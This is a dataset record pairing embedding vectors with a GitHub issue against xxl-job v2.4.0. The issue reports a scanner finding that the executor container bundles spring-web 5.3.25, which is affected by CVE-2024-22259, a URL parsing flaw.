-0.011767005547881126, -0.0013212106423452497, 0.00637240894138813, 0.02140544168651104, -0.008281471207737923, -0.012418881058692932, -0.014341246336698532, -0.025063922628760338, 0.007110757287591696, -0.00743004260584712, 0.012911112979054451, 0.00191903964150697, 0.004486628342419863, -0.003232767106965184, -0.00715066771954298, 0.01862499490380287, -0.01682901382446289, 0.013928835280239582, -0.01708178222179413, -0.0041108024306595325, 0.010270354337990284, 0.006132944952696562, -0.01585785299539566, -0.022509636357426643, 0.0064455787651240826, 0.014727049507200718, -0.005793703719973564, -0.03142302855849266, 0.00923932809382677, 0.00628593610599637, 0.009532006457448006, -0.007762631867080927, 0.006675065029412508, -0.011321336030960083, -0.016283567994832993, -0.0016188779845833778, -0.008634015917778015, 0.0017860040534287691, -0.016709281131625175, -0.0030332135502249002, 0.0005816153716295958, -0.008128480054438114, 0.014580710791051388, 0.00413408363237977, 0.015166067518293858, 0.01964936964213848, -0.017001960426568985, 0.007775935344398022, 0.012166112661361694, -0.014101781882345676, -0.01752079837024212, 0.013090711086988449, -0.005773748736828566, -0.0070176320150494576, 0.0033524991013109684, 0.00656531099230051, -0.004406807012856007, 0.006911203730851412, 0.00020516596850939095, 0.0007308647618629038, 0.0025975217577069998, 0.0019389950903132558, 0.007257096469402313, -0.012412228621542454, 0.006345801986753941, 0.008700533770024776, 0.0006277621141634881, -0.0023580575361847878, 0.01834562048316002, -0.004739396274089813, -0.004603034351021051, 0.006778168026357889, -0.00914620328694582, -0.01819928176701069, -0.00861406046897173, -0.03653159737586975, -0.0016305185854434967, -0.016669370234012604, -0.021511869505047798, 0.013097362592816353, -0.0004889061092399061, -0.010356827639043331, 0.012319103814661503, -0.013782496564090252, 0.0031812156084924936, 0.018132762983441353, -0.0036618071608245373, 0.0002569251519162208, 0.004533190745860338, 0.01299093384295702, -0.000788652163464576, -0.000878866936545819, -0.004317007958889008, 0.004479976370930672, 0.012119550257921219, -0.04890391603112221, -0.011926649138331413, 0.004350266885012388, 0.0022017403971403837, 0.002228347584605217, 0.029347671195864677, -0.012711559422314167, 0.002557610860094428, 0.0026839948259294033, 0.010104060173034668, 0.0022316735703498125, -0.01306410413235426, -0.012099594809114933, 0.00839455146342516, 0.00868057832121849, 0.0016812384128570557, -0.01644320972263813, -0.010183881036937237, 0.02101963758468628, 0.002178459195420146, 0.013995353132486343, -0.007509863935410976, -0.00963178277015686, 0.010130667127668858, -0.015724817290902138, -0.004862454254180193, -0.009598524309694767, 0.01955624483525753, -0.025529546663165092, 0.00767615856602788, -0.01527249626815319, 0.030518384650349617, 0.002645747037604451, 0.0013453232822939754, -0.0070442394353449345, -0.006991025060415268, -0.004619664046913385, 0.019955351948738098, -0.01994204893708229, -0.00764955161139369, -0.00939231924712658, -0.01649642363190651, -0.012192719615995884, 0.021511869505047798, -0.006997676566243172, 0.0012721536913886666, 0.002506059594452381, 0.010217140428721905, 0.00048516449169255793, 0.0027338832151144743, -0.013995353132486343, 0.012106247246265411, 0.004619664046913385, 0.0015398879768326879, -0.0032244522590190172, 0.011241515167057514, 0.006196136586368084, -0.007962185889482498, -0.00419727573171258, -0.0061662038788199425, -0.012059684842824936, -0.02028794027864933, -0.014101781882345676, 0.003394072875380516, -0.01196655910462141, -0.009591872803866863, -0.0011025331914424896, 0.017254726961255074, 0.010197184979915619, 0.028283385559916496, -0.012199372053146362, 0.008627363480627537, 0.01479356735944748, -0.004549820441752672, 0.00890008732676506, 0.009871247224509716, 0.011447720229625702, -0.01004419382661581, -0.0038779901806265116, -0.012199372053146362, -0.005467766430228949, -0.009013167582452297, -0.003545400919392705, 0.0011607363121584058, -0.006089708302170038, 0.0135496836155653, 0.009997631423175335, -0.01128807757049799, -0.0006610210402868688, -0.0015748098958283663, 0.010429996997117996, 0.004736070055514574, -0.014128388836979866, -0.02217704802751541, -0.015485352836549282, -0.02548963576555252, -0.02063383348286152, -0.011121782474219799, 0.003014921210706234, 0.008600756525993347, -0.0014451000606641173, 0.02788427844643593, 0.011900041252374649, 0.008534238673746586, -0.008334685117006302, 0.032913025468587875, 0.00870718527585268, -0.012026425451040268, 0.0036418517120182514, -0.012392273172736168, 0.0031296643428504467, -0.0035520526580512524, 0.02801731415092945, 0.00836794450879097, -0.016376692801713943, -0.007995444349944592, -0.016163835301995277, -0.0023081691469997168, -0.001737778540700674, -0.016137227416038513, -0.0015955966664478183, -0.007822497747838497, 0.013729281723499298, 0.00649546692147851, -0.02232338674366474, -0.018172673881053925, -0.013110666535794735, 0.014993120916187763, 0.030278921127319336, 0.006585265975445509, 0.0062560029327869415, -0.009618479758501053, 0.011414461769163609, -0.005550913512706757, -0.02219035103917122, 0.04861123859882355, -0.017919905483722687, -0.012059684842824936, -0.020208120346069336, 0.0062493509612977505, 0.0050819627940654755, 0.008008748292922974, 0.003997722174972296, -0.008986560627818108, -0.005810333415865898, 0.023999636992812157, -0.03599945455789566, -0.01196655910462141, -0.024265708401799202, -0.01741437055170536, -0.012605130672454834, -0.009505399502813816, 0.0025808922946453094, 0.02433222532272339, -0.014061870984733105, -0.004044284578412771, 0.0021950886584818363, 0.013044148683547974, -0.011926649138331413, -0.01882454939186573, 0.02724570780992508, 0.004144061356782913, -0.01697535254061222, -0.008840220980346203, -0.01087566651403904, 0.010350176133215427, -0.0017061826074495912, 0.01376919262111187, 0.0018957584397867322, 0.012784728780388832, 0.000050797803851310164, 0.02246972545981407, -0.021445350721478462, 0.031077135354280472, -0.006661761552095413, -0.00007197438389994204, -0.05539605766534805, -0.014460978098213673, 0.0025808922946453094, -0.009645086713135242, -0.007948881946504116, 0.00839455146342516, -0.00008361500658793375, -0.026141511276364326, -0.020327851176261902, -0.0001101701709558256, -0.015738120302557945, -0.0019805687479674816, 0.001509123481810093, -0.005607454106211662, -0.0028137045446783304, 0.024199189618229866, 0.023760171607136726, -0.0001078836212400347, 0.02003517374396324, -0.00892669428139925, 0.008833569474518299, 0.014221514575183392, 0.009884551167488098, -0.012538612820208073, -0.004779306706041098, -0.024731332436203957, 0.01172709558159113, -0.007024283986538649, -0.008108524605631828, -0.008627363480627537, 0.01520597841590643, 0.006977721583098173, -0.004589730873703957, -0.01854517310857773, 0.025569457560777664, 0.00547441840171814, 0.01814606599509716, 0.0001444684312446043, -0.009039774537086487, 0.008687229827046394, -0.007283703424036503, -0.009565264917910099, -0.00043278170051053166, 0.02340097539126873, -0.042065881192684174, 0.010549729689955711, 0.008075266145169735, -0.026394279673695564, -0.02519695833325386, -0.0008755410672165453, 0.013822407461702824, -0.003058157628402114, -0.005933391395956278, -0.003944507800042629, -0.0029982917476445436, 0.0076162926852703094, -0.009751515462994576, -0.0026923096738755703, 0.0023015171755105257, 0.017041871324181557, 0.00038912935997359455, 0.006179507356137037, 0.03182213380932808, -0.008640667423605919, -0.005185065791010857, -0.00770941749215126, -0.00929254200309515, -0.005284842569380999, 0.007130712270736694, -0.023267939686775208, -0.008008748292922974, 0.0012405577581375837, 0.0037915168795734644, 0.011055264621973038, 0.0030215729493647814, -0.011101827025413513, -0.004144061356782913, 0.01349646970629692, -0.008128480054438114, 0.012033076956868172, -0.021099459379911423, 0.019875530153512955, 0.003924552351236343, -0.0016138891223818064, 0.012252585962414742, -0.008281471207737923, 0.04363570362329483, -0.025210261344909668, 0.02043428085744381, 0.017214816063642502, 0.0007932252483442426, -0.0002608746581245214, -0.0011640621814876795, 0.00897990819066763, 0.001287951716221869, -0.0021634928416460752, -0.011813567951321602, -0.006964417640119791, 0.009412274695932865, -0.014687138609588146, 0.010609595105051994, 0.0056606680154800415, -0.023813387379050255, 0.0017344526713714004, -0.023826690390706062, -0.00770941749215126, 0.019835619255900383, -0.008607408031821251, -0.0025725774466991425, 0.00565734226256609, 0.011620666831731796, -0.0034689053427428007, 0.0061562261544167995, -0.013356782495975494, 0.02179124392569065, -0.004559797700494528, 0.0006930327508598566, 0.016948746517300606, -0.006116315256804228, 0.0010759260039776564, 0.006951114162802696, 0.002027131151407957, -0.009478792548179626, 0.012837942689657211, -0.007363524753600359, -0.005457788705825806, 0.0032128116581588984, -0.005730512086302042, 0.0025177001953125, -0.020713655278086662, 0.0013245365116745234, 0.01427472848445177, 0.0059766280464828014, -0.010310265235602856, -0.0025310039054602385, 0.010090756230056286, 0.007037587463855743, 0.007390132173895836, -0.010915577411651611, 0.003991070203483105, -0.02349410019814968, 0.014993120916187763, 0.012312452308833599, 0.0067282794043421745, -0.016855619847774506, 0.024305619299411774, -0.011647273786365986, -0.0005537610268220305, 0.009864595718681812, -0.003448949893936515, -0.021325619891285896, 0.01228584535419941, 0.010137318633496761, 0.012086291797459126, -0.011594059877097607, 0.025649279356002808, -0.0032011710572987795, 0.00646885996684432, -0.000987789942882955, -0.005161784589290619, 0.0034622536040842533, -0.01026370283216238, -0.0028619300574064255, 0.01128807757049799, 0.011647273786365986, 0.008008748292922974, -0.004769328981637955, -0.014354550279676914, 0.01565830036997795, -0.0025925328955054283, 0.012299148365855217, -0.031742312014102936, 0.008906738832592964, 0.002827008254826069, 0.0017943187849596143, 0.017041871324181557, 0.02713927812874317, 0.007390132173895836, -0.003997722174972296, -0.002557610860094428, 0.024159278720617294, -0.01053642574697733, 0.008414506912231445, 0.004872431978583336, -0.0027222426142543554, 0.002928447909653187, 0.0014808534178882837, -0.011886738240718842, -0.009359059855341911, -0.021471958607435226, -0.00923932809382677, -0.013370085507631302, 0.004433413967490196, -0.025463029742240906, -0.004340289160609245, 0.012219327501952648, 0.01664276421070099, 0.022828923538327217, -0.01517937146127224, 0.012911112979054451, 0.031449634581804276, -0.012891157530248165, -0.005284842569380999, -0.008547542616724968, 0.0013245365116745234, -0.0008426978602074087, 0.0011773657752200961, 0.005311449524015188, 0.03347177803516388, 0.015378925018012524, 0.002669028239324689, 0.008933345787227154, 0.014633924700319767, -0.02003517374396324, -0.005434507504105568, 0.012884506024420261, -0.014194906689226627, -0.002148526255041361, -0.007662855088710785, 0.004766003228724003, 0.009671693667769432, 0.022270172834396362, 0.0025609368458390236, 0.014021961018443108, 0.0034822088200598955, -0.00543783325701952, -0.004892386961728334, 0.041134633123874664, -0.002970021450892091, -0.004044284578412771, 0.003734976751729846, 0.0074167391285300255, 0.0028236822690814734, -0.016629459336400032, -0.009525354951620102, -0.015511960722506046, 0.022017404437065125, 0.0029517291113734245, -0.0019323432352393866, -0.01609731651842594, -0.013243702240288258, 0.0034223429393023252, 0.009904506616294384, 0.033445168286561966, 0.002519363071769476, 0.004217231180518866, -0.005321427248418331, -0.01520597841590643, 0.00097947521135211, 0.0023414280731230974, 0.004845824558287859, 0.0060597751289606094, -0.009565264917910099, 0.008554194122552872, -0.00005027813313063234, -0.0077958907932043076, -0.009405622258782387, 0.0025409813970327377, -0.028150349855422974, -0.008221604861319065, 0.008387899957597256, 0.01750749535858631, 0.00767615856602788, -0.00939231924712658, 0.014088478870689869, 0.0030897536780685186, 0.02314820885658264, 0.007789239287376404, -0.004040958825498819, 0.008155087009072304, -0.008248211815953255, 0.0018442070577293634, -0.021578386425971985, 0.007263747975230217, 0.03762248903512955, -0.021179279312491417, -0.015432138927280903, -0.012172765098512173, 0.006465534213930368, 0.00015860347775742412, -0.015192674472928047, 0.02704615332186222, -0.00135945831425488, -0.011115130968391895, 0.03192856162786484, -0.026407582685351372, 0.006515422370284796, 0.00012066752242390066, 0.0016862272750586271, 0.03858034685254097 ]
null
null
null
null
null
null
null
null
null
[ "xuxueli", "xxl-job" ]
Please answer some questions before submitting your issue. Thanks! ### Which version of XXL-JOB do you using? v2.4.0 ### Expected behavior ### Actual behavior ### Steps to reproduce the behavior ### Other information 软件:spring-web(jar) 5.3.25 路径:/app.jar(BOOT-INF/lib/spring-web-5.3.25.jar) 命中:spring-web(jar) version less than 5.3.33 容器名称:xxl-job-exec 镜像名称:xxl-job-executor:2024-04-08
Spring Web UriComponentsBuilder URL解析不当漏洞(CVE-2024-22259)
https://api.github.com/repos/xuxueli/xxl-job/issues/3445/comments
0
2024-05-08T05:42:30
2024-05-08T05:45:47Z
https://github.com/xuxueli/xxl-job/issues/3445
2,284,724,792
3,445
false
This is a GitHub Issue repo:xxl-job owner:xuxueli Title : Spring Web UriComponentsBuilder URL解析不当漏洞(CVE-2024-22259) Issue date: --- start body --- Please answer some questions before submitting your issue. Thanks! ### Which version of XXL-JOB do you using? v2.4.0 ### Expected behavior ### Actual behavior ### Steps to reproduce the behavior ### Other information 软件:spring-web(jar) 5.3.25 路径:/app.jar(BOOT-INF/lib/spring-web-5.3.25.jar) 命中:spring-web(jar) version less than 5.3.33 容器名称:xxl-job-exec 镜像名称:xxl-job-executor:2024-04-08 --- end body ---
572
[ 0.01967429183423519, -0.016572697088122368, -0.0023609150666743517, 0.0124758156016469, 0.0691300630569458, 0.00813204050064087, -0.00835578702390194, 0.04647761955857277, -0.007784847170114517, 0.013995750807225704, 0.013208779506385326, 0.020631002262234688, -0.005169323645532131, -0.009489952586591244, -0.0058984300121665, 0.05348321050405502, -0.007699977606534958, 0.016433820128440857, 0.0036339573562145233, 0.003014795947819948, -0.01669614389538765, 0.01999833807349205, -0.0032867640256881714, 0.05965553969144821, -0.005423932336270809, 0.02674160525202751, -0.011549966409802437, 0.007341211196035147, -0.037836361676454544, 0.01007632352411747, 0.02598549611866474, 0.014474106021225452, 0.03740429878234863, 0.020260661840438843, 0.041416313499212265, 0.00781570840626955, 0.015878310427069664, 0.049255166202783585, -0.042187854647636414, -0.01683502085506916, -0.005485655274242163, -0.039626337587833405, -0.004945576656609774, 0.026541005820035934, 0.008448372595012188, -0.015137631446123123, -0.025306539610028267, -0.0031054518185555935, -0.04619986563920975, 0.0405830480158329, 0.007491661701351404, -0.029256828129291534, -0.015261078253388405, -0.04539746418595314, 0.001825658488087356, -0.010045462287962437, 0.028809335082769394, 0.02993578463792801, -0.004359205719083548, 0.031247403472661972, 0.014628414064645767, -0.015315085649490356, 0.008679834194481373, 0.021279096603393555, 0.0013010107213631272, 0.06851282715797424, -0.021525990217924118, 0.021263666450977325, 0.0054740821942687035, 0.024689307436347008, 0.0033677758183330297, -0.0020966622978448868, 0.03431813791394234, -0.022143222391605377, 0.0210630651563406, 0.012946455739438534, 0.01729794591665268, 0.012815293855965137, -0.011827721260488033, 0.016618989408016205, -0.0399966761469841, -0.015423101373016834, -0.012221206910908222, -0.042342159897089005, 0.03672534599900246, -0.005026588682085276, -0.06132206693291664, -0.08178333193063736, 0.01452039834111929, -0.03052215650677681, -0.01802319474518299, -0.013663988560438156, -0.025229385122656822, -0.0324355773627758, 0.030414139851927757, -0.001423492911271751, -0.03789808601140976, -0.0034024950582534075, -0.054964568465948105, -0.006423077546060085, 0.00033128034556284547, 0.005157750565558672, -0.01771457865834236, -0.03453416749835014, 0.05425475165247917, -0.050736527889966965, 0.03258988633751869, -0.006943867541849613, -0.0008752166759222746, 0.09616485238075256, 0.02944199927151203, 0.015847448259592056, -0.01607891172170639, -0.017699146643280983, 0.000575762358494103, 0.020723586902022362, -0.036756206303834915, -0.05200185254216194, -0.036756206303834915, -0.0005723868380300701, 0.014188636094331741, -0.018918180838227272, -0.0052619087509810925, -0.05672368407249451, -0.034811921417713165, 0.027883486822247505, -0.02073901891708374, 0.034503307193517685, -0.011897159740328789, 0.002698464086279273, -0.0004737743001896888, -0.013177917338907719, -0.025352831929922104, -0.04317542538046837, 0.004405498038977385, -0.0027138949371874332, 0.018100347369909286, 0.032559022307395935, -0.0028450568206608295, -0.0069091483019292355, -0.04348404332995415, -0.04684796184301376, -0.03595380485057831, -0.033916935324668884, -0.040089260786771774, -0.01924222894012928, 0.0016539907082915306, 0.023408548906445503, -0.03453416749835014, -0.02405664324760437, -0.030769048258662224, -0.02751314640045166, 0.017683716490864754, 0.05021187663078308, 0.06993246078491211, -0.04971809312701225, 0.022343823686242104, 0.02914881333708763, 0.01834724098443985, -0.019581707194447517, 0.009428229182958603, -0.018686719238758087, 0.02268330007791519, -0.00631120428442955, 0.008764703758060932, -0.04570607841014862, 0.009775422513484955, 0.008865004405379295, -0.025491708889603615, 0.02453499846160412, 0.0001721500448184088, -0.004563664086163044, 0.009435944259166718, -0.01638752780854702, -0.03530570864677429, -0.012236637994647026, 0.029210535809397697, 0.020646432414650917, -0.02674160525202751, -0.00797001738101244, -0.006453939247876406, 0.03425641357898712, -0.004656249191612005, 0.016912175342440605, 0.008656688034534454, -0.03518226370215416, 0.021988913416862488, -0.026834189891815186, 0.0042859092354774475, -0.04561349377036095, -0.033916935324668884, 0.004636960569769144, 0.00939736794680357, -0.019134212285280228, 0.009567106142640114, -0.016572697088122368, -0.0034719337709248066, -0.033299703150987625, 0.04132372885942459, -0.01306990161538124, 0.0034140681382268667, 0.014890738762915134, -0.047280024737119675, -0.01444324478507042, -0.01877930387854576, 0.012776716612279415, -0.005034304223954678, 0.026124373078346252, 0.015453963540494442, -0.010809287428855896, -0.0366944819688797, -0.010084038600325584, 0.019952045753598213, 0.024581290781497955, -0.005308201070874929, 0.004567521624267101, -0.0023956343065947294, -0.0011293429415673018, -0.07505549490451813, -0.006041164975613356, 0.025136800482869148, -0.011411089450120926, 0.015392240136861801, 0.004717972129583359, -0.029411137104034424, -0.03866962715983391, 0.0003749206371139735, -0.007345068734139204, -0.009489952586591244, -0.003539443714544177, 0.0299049224704504, -0.029364844784140587, -0.011303073726594448, -0.0135945500805974, 0.009729130193591118, -0.000757074449211359, -0.009073320776224136, -0.009212197735905647, -0.03579949587583542, -0.0006321812979876995, 0.0285470113158226, 0.01698932982981205, -0.002966574626043439, -0.011426519602537155, -0.001658812863752246, -0.007649827282875776, 0.013663988560438156, -0.014458675868809223, -0.001322228112258017, 0.017699146643280983, 0.0029241398442536592, 0.015345947816967964, 0.01156539749354124, -0.0224209763109684, -0.0077501279301941395, -0.0026039504446089268, 0.004988011438399553, 0.011218204163014889, 0.0279606394469738, 0.012583831325173378, 0.002467001788318157, 0.018069487065076828, -0.027590300887823105, 0.006176184397190809, 0.0233005341142416, -0.04302111640572548, -0.03607724979519844, 0.025476278737187386, -0.011573112569749355, -0.009960592724382877, 0.03518226370215416, -0.01073984894901514, -0.02587747946381569, 0.027605731040239334, -0.024905338883399963, -0.025028785690665245, 0.03866962715983391, 0.01715906895697117, 0.03836100921034813, -0.04839104041457176, 0.010130330920219421, 0.0029974360950291157, -0.00473726075142622, -0.00976770743727684, 0.000626394699793309, -0.014720999635756016, 0.028963644057512283, -0.020245231688022614, 0.007090460509061813, -0.014304366894066334, -0.025769464671611786, 0.00924305897206068, -0.03323797881603241, 0.010338647291064262, 0.005724832881242037, 0.043700072914361954, 0.000496197200845927, 0.021093927323818207, -0.033886075019836426, 0.013856873847544193, -0.018594134598970413, 0.01369484979659319, 0.0008703945204615593, 0.016171496361494064, -0.0035818784963339567, -0.001235429779626429, 0.029519153758883476, 0.00962111447006464, -0.022729594260454178, -0.012923309579491615, 0.024982493370771408, -0.025800326839089394, 0.011002172715961933, -0.008294064551591873, -0.015577409416437149, 0.008803281001746655, 0.025460848584771156, 0.005983299110084772, -0.04348404332995415, -0.007510950323194265, -0.050427909940481186, 0.004783553071320057, -0.04221871495246887, 0.01967429183423519, 0.035861220210790634, 0.024241812527179718, -0.050890833139419556, 0.003223111853003502, -0.00732578057795763, 0.001130307326093316, 0.007765558548271656, 0.011619404889643192, -0.032991085201501846, -0.054810263216495514, -0.009682837873697281, -0.03805239498615265, 0.0017774372827261686, 0.009096466936171055, 0.0333922877907753, -0.018084917217493057, -0.004185609053820372, 0.008571818470954895, 0.00910418201237917, 0.04243474826216698, 0.02373259700834751, -0.00748780369758606, 0.01059325598180294, -0.012938739731907845, 0.03749688342213631, 0.0027466854080557823, 0.0009523707558400929, -0.012059183791279793, -0.013663988560438156, 0.026973068714141846, 0.010971310548484325, -0.025892911478877068, -0.016017187386751175, 0.014535829424858093, 0.0020658005960285664, -0.0016076982719823718, -0.003614668967202306, -0.01685045287013054, -0.006843567360192537, 0.043051980435848236, 0.03336142748594284, -0.029982076957821846, 0.0006037307321093976, -0.012738139368593693, -0.03666362166404724, 0.0024129939265549183, -0.02586204931139946, 0.04012012481689453, 0.026803329586982727, 0.01590917259454727, -0.0072486260905861855, -0.01497560739517212, -0.01998290792107582, 0.002596234902739525, -0.02887105941772461, 0.01820836402475834, -0.028840197250247, -0.013424810953438282, -0.011688844300806522, -0.030892495065927505, -0.020183509215712547, 0.02239011600613594, 0.018285518512129784, -0.018702149391174316, -0.0024457843974232674, -0.022066067904233932, -0.03169489651918411, 0.07054969668388367, -0.02104763500392437, -0.028608733788132668, -0.017961470410227776, -0.0004484581295400858, -0.011295357719063759, 0.0026213100645691156, 0.03160231187939644, -0.0059678684920072556, 0.002804551040753722, 0.025507140904664993, 0.022019775584340096, -0.0005791378207504749, 0.04635417461395264, -0.021988913416862488, 0.028238395228981972, -0.025970064103603363, 0.02526024729013443, -0.012714993208646774, 0.01595546491444111, -0.008170617744326591, -0.0014611055376008153, -0.009837145917117596, 0.03169489651918411, 0.00856410339474678, 0.03944116830825806, -0.017699146643280983, -0.0007700942223891616, 0.01541538629680872, -0.005049734842032194, 0.024118367582559586, 0.026247819885611534, -0.0004942683735862374, -0.001184315187856555, 0.04647761955857277, -0.019766876474022865, 0.035583462566137314, 0.028932781890034676, -0.001901848241686821, -0.0177608709782362, 0.01202060654759407, 0.018887320533394814, 0.014366090297698975, 0.019658861681818962, 0.005983299110084772, 0.020368678495287895, -0.025630587711930275, -0.019165074452757835, -0.00007323610043385997, -0.025661448016762733, 0.04919344559311867, -0.00585599523037672, -0.021448835730552673, -0.049409475177526474, 0.004752691835165024, -0.03425641357898712, -0.014196351170539856, -0.004332202021032572, -0.00029728433582931757, -0.027621163055300713, 0.029796907678246498, -0.020862463861703873, -0.022513562813401222, -0.02467387542128563, -0.015376809053122997, -0.03755860775709152, 0.009212197735905647, 0.024596722796559334, 0.009135043248534203, -0.018084917217493057, 0.05919261276721954, -0.043082840740680695, -0.00932792853564024, -0.014366090297698975, 0.022606147453188896, 0.01098674163222313, 0.0029144955333322287, 0.023269671946763992, -0.040644772350788116, 0.002582733053714037, -0.019026197493076324, 0.03595380485057831, 0.011974314227700233, -0.03292936459183693, 0.03274419531226158, -0.0028643454425036907, -0.03876221179962158, -0.013501964509487152, 0.010585539974272251, -0.024010350927710533, -0.010462094098329544, 0.001738860155455768, -0.007078887429088354, 0.012877016328275204, -0.045459188520908356, -0.006631393451243639, -0.01924222894012928, 0.0025383695028722286, 0.0300900936126709, 0.040089260786771774, -0.03758947178721428, -0.023562857881188393, -0.009883438237011433, -0.007784847170114517, -0.02056927978992462, -0.03354659676551819, -0.016742436215281487, 0.03218868374824524, 0.011619404889643192, -0.013640842400491238, 0.0010222916025668383, 0.011318503879010677, 0.008548672311007977, 0.018300948664546013, -0.05079824849963188, -0.045490048825740814, 0.05190926790237427, -0.028238395228981972, -0.002553800120949745, 0.008456087671220303, -0.017174499109387398, -0.00035297992872074246, -0.06659940630197525, -0.019905753433704376, -0.051508065313100815, 0.013008179143071175, 0.012923309579491615, -0.013826011680066586, 0.01013804692775011, -0.04311370104551315, -0.024272674694657326, -0.003024440025910735, 0.013810581527650356, 0.019921185448765755, -0.007931440137326717, -0.003878921503201127, -0.0016414531273767352, 0.022791316732764244, -0.008919011801481247, 0.017513977363705635, 0.02137168124318123, 0.005690113641321659, 0.07703063637018204, -0.0384535975754261, 0.041848376393318176, -0.02283760905265808, -0.013039040379226208, -0.014844445511698723, 0.019751446321606636, -0.01652640476822853, 0.04974895343184471, -0.018439825624227524, 0.005138461943715811, -0.01865585707128048, 0.02870132029056549, -0.003379348898306489, 0.011318503879010677, 0.011303073726594448, -0.022914763540029526, 0.024303536862134933, -0.0438852421939373, 0.026525573804974556, -0.0034970089327543974, -0.012051467783749104, 0.01073984894901514, -0.0005058414535596967, 0.03228126838803291, 0.004756549373269081, 0.0025923773646354675, -0.006037306971848011, -0.0020638718269765377, 0.0009219913044944406, -0.03069189563393593, 0.025044215843081474, 0.00924305897206068, -0.005987157113850117, 0.016341235488653183, -0.029719753190875053, -0.012614692561328411, -0.006967013701796532, 0.0033369141165167093, -0.005138461943715811, 0.003379348898306489, -0.024920769035816193, -0.009875723160803318, -0.007507092319428921, 0.01655726693570614, 0.015708571299910545, 0.0063073462806642056, -0.01726708374917507, 0.017205361276865005, -0.007846570573747158, 0.007939155213534832, -0.0018353027990087867, 0.031154818832874298, -0.01848611794412136, -0.007017164025455713, -0.021387111395597458, 0.005323631688952446, -0.0009388687903992832, -0.00009077660070033744, 0.0018815952353179455, 0.0014427814166992903, 0.03354659676551819, 0.022004345431923866, -0.010276923887431622, 0.02137168124318123, 0.00790057796984911, 0.00008824498218018562, 0.009011597372591496, 0.03191092982888222, 0.02453499846160412, -0.02916424348950386, -0.0013791292440146208, 0.03709568455815315, 0.01820836402475834, -0.009582537226378918, -0.022976486012339592, 0.04160148277878761, 0.03524398431181908, 0.022791316732764244, 0.036756206303834915, -0.02572317235171795, -0.005030446220189333, 0.00932792853564024, 0.02345484122633934, -0.0010020387126132846, 0.0021718875505030155, 0.011804575100541115, -0.01195888314396143, -0.04252733290195465, 0.02944199927151203, -0.031509727239608765, 0.004405498038977385, 0.0005825133412145078, 0.006662255153059959, -0.0011428449070081115, 0.011434235610067844, 0.010030031204223633, -0.04944033920764923, 0.009590252302587032, -0.013486534357070923, -0.039163414388895035, -0.007572673261165619, 0.006874429062008858, 0.025800326839089394, 0.009111897088587284, -0.0072023337706923485, -0.004270478617399931, -0.0268959142267704, 0.02029152400791645, -0.009142759256064892, 0.0023049782030284405, -0.02060014009475708, 0.031478866934776306, -0.02464301511645317, 0.029889492318034172, -0.0009620150085538626, 0.017344238236546516, -0.014466390945017338, 0.008718411438167095, 0.011542251333594322, 0.015253362245857716, 0.040212709456682205, -0.01013804692775011, 0.017097344622015953, 0.019581707194447517, -0.006199330557137728, -0.016788728535175323, -0.0384535975754261, -0.039317723363637924, 0.0041200281120836735, 0.009690552949905396, -0.003155602142214775, -0.001365627278573811, -0.009081035852432251, 0.020507555454969406, 0.018084917217493057, 0.01209776010364294, 0.03246643766760826, -0.009574822150170803, -0.013085332699120045, 0.04283594712615013, -0.03897824510931969, -0.00710589112713933, 0.010145762003958225, -0.0043669212609529495, 0.00887271948158741, -0.012907878495752811, -0.01021520048379898, -0.03200351446866989, -0.002738970099017024, -0.0018082988681271672, -0.011850867420434952, -0.016618989408016205, 0.004027443006634712, -0.009027027525007725, 0.012877016328275204, -0.0016510974382981658, 0.004683252889662981, 0.008240056224167347, 0.012985032051801682, 0.00578269874677062, -0.0011804575333371758, -0.004224186297506094, 0.021865468472242355, 0.002513294341042638, -0.03206523880362511, -0.0006090350798331201, -0.021001342684030533, 0.01570085622370243, -0.03928685933351517, 0.008625826798379421, 0.01865585707128048, 0.007341211196035147, -0.003709182608872652, 0.0021545279305428267, 0.000021940692022326402, 0.004733403213322163, -0.017529407516121864, 0.009582537226378918, 0.014767291955649853, -0.002771760569885373, 0.0053004855290055275, -0.011372512206435204, 0.022667869925498962, 0.010577824898064137, -0.002071587136015296, 0.037219129502773285, -0.01924222894012928, -0.014350660145282745, -0.026880482211709023, -0.06197015941143036, -0.01225206907838583, -0.02137168124318123, 0.039904091507196426, 0.001108125550672412, -0.0036879652179777622, 0.004771979991346598, -0.0134479571133852, 0.010207485407590866, 0.0044595059007406235, 0.008494664914906025, -0.013332226313650608, 0.0015884097665548325, 0.02121737413108349, -0.0345650315284729, -0.016742436215281487, 0.018254656344652176, 0.003444929840043187, -0.021572282537817955, 0.03154059126973152, -0.01836267299950123, -0.005979441571980715, -0.02647928148508072, -0.010600971058011055, -0.0008626790950074792, -0.0070750294253230095, 0.03604638949036598, 0.03762033209204674, 0.014543545432388783, -0.014265790581703186, -0.01862499676644802, -0.02107849530875683, 0.01893361285328865, 0.024010350927710533, -0.0046678222715854645, -0.027605731040239334, -0.016156066209077835, 0.0021390970796346664, 0.042342159897089005, 0.0012769000604748726, 0.005092169623821974, -0.009806283749639988, 0.010161193087697029, 0.017930610105395317, 0.012954170815646648, 0.010192054323852062, 0.02738969959318638, -0.010184339247643948, -0.02239011600613594, -0.010863294824957848, -0.01367170363664627, 0.003462289460003376, 0.011141049675643444, 0.03305280953645706, 0.0031305269803851843, 0.01352511066943407, 0.031247403472661972, -0.0017610419308766723, -0.0210630651563406, 0.009729130193591118, 0.002488219179213047, -0.022436408326029778, -0.001054117688909173, -0.01073984894901514, -0.021850036457180977, -0.00010138528887182474, 0.02252899296581745, -0.03703396022319794, -0.013872303999960423, -0.0043746368028223515, -0.023269671946763992, 0.016943037509918213, -0.05731005594134331, -0.0025364405009895563, 0.01096359547227621, 0.028932781890034676, -0.004270478617399931, 0.03484278544783592, 0.03774377703666687, -0.014605267904698849, 0.005022731143981218, 0.004301340319216251, 0.022745024412870407, -0.004575237166136503, 0.03218868374824524, -0.05123031139373779, 0.01836267299950123, -0.0004371261165942997, -0.03323797881603241, -0.023531995713710785, 0.02663359045982361, -0.0009591217385604978, -0.00041060440707951784, -0.00007106614793883637, -0.013463388197124004, -0.016618989408016205, 0.018733011558651924, 0.017544839531183243, -0.013401664793491364, 0.012113191187381744, 0.0012016749242320657, 0.010323216207325459, -0.015068192966282368, 0.013193348422646523, 0.018115779384970665, 0.013440241105854511, -0.017946040257811546, 0.008070317097008228, -0.021001342684030533, -0.0007889005355536938, -0.00522333150729537, -0.015446247532963753, 0.0313708521425724, -0.01555426325649023, 0.013455672189593315, -0.0030186534859240055, 0.016865883022546768, 0.027019361034035683, -0.012190345674753189, -0.019473690539598465, -0.0097059840336442, -0.011719705536961555, 0.008687550202012062, -0.02029152400791645, -0.00984486099332571, 0.018254656344652176, 0.0008197621791623533, -0.001966464798897505, 0.03768205642700195, 